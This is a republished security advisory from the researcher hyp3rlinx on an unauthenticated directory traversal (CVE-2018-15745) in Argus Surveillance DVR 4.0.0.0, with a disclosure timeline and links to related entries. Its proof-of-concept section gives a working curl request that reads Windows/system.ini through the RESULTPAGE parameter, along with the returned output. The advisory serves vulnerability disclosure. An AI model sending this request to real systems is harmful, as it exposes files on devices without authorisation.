Argus Surveillance DVR 4.0.0.0 Directory Traversal

🗓️ 29 Aug 2018 00:00:00Reported by hyp3rlinxType

packetstorm🔗 packetstormsecurity.com👁 74 Views

Argus Surveillance DVR 4.0.0.0 Unauthenticated Directory Traversa

Reporter	Title	Published	Views	Family All 12
0day.today	Argus Surveillance DVR 4.0.0.0 Directory Traversal Vulnerability	29 Aug 201800:00	–	zdt
ATTACKERKB	CVE-2018-15745	30 Aug 201800:00	–	attackerkb
Circl	CVE-2018-15745	29 Aug 201800:00	–	circl
Check Point Advisories	Argus Surveillance DVR Directory Traversal (CVE-2018-15745)	31 May 202000:00	–	checkpoint_advisories
CVE	CVE-2018-15745	30 Aug 201817:00	–	cve
Cvelist	CVE-2018-15745	30 Aug 201817:00	–	cvelist
Metasploit	Argus Surveillance DVR 4.0.0.0 - Directory Traversal	1 Feb 202518:54	–	metasploit
Nuclei	Argus Surveillance DVR 4.0.0.0 - Local File Inclusion	2 Jun 202610:14	–	nuclei
NVD	CVE-2018-15745	30 Aug 201817:29	–	nvd
OpenVAS	Argus Surveillance DVR Multiple Vulnerabilities	29 Aug 201800:00	–	openvas

`[+] Credits: John Page (aka hyp3rlinx)   
[+] Website: hyp3rlinx.altervista.org  
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt  
[+] ISR: Apparition Security   
  
Greetz: ***Greetz: indoushka | Eduardo | GGA***  
  
  
[Vendor]  
www.argussurveillance.com  
  
  
[Product]  
Argus Surveillance DVR - 4.0.0.0  
  
Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site.  
When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video.  
This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.  
  
  
[Vulnerability Type]  
Directory Traversal  
  
  
[CVE Reference]  
CVE-2018-15745  
  
  
[Security Issue]  
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure  
via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.  
  
  
[Affected Component]  
WEBACCOUNT.CGI RESULTPAGE parameter  
  
  
[Exploit/POC]  
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="  
  
; for 16-bit app support  
woafont=dosapp.fon  
EGA80WOA.FON=EGA80WOA.FON  
EGA40WOA.FON=EGA40WOA.FON  
CGA80WOA.FON=CGA80WOA.FON  
CGA40WOA.FON=CGA40WOA.FON  
  
wave=mmdrv.dll  
timer=timer.drv  
  
  
  
[Video POC URL]  
https://vimeo.com/287115273  
  
  
  
[Network Access]  
Remote  
  
  
  
[Severity]  
High  
  
  
  
[Disclosure Timeline]  
Vendor Notification: August 17, 2018  
Second attempt: August 21, 2018  
CVE Assigned Mitre: August 23, 2018  
August 28, 2018 : Public Disclosure  
  
  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).  
  
hyp3rlinx  
`

29 Aug 2018 00:00Current

EPSS0.87945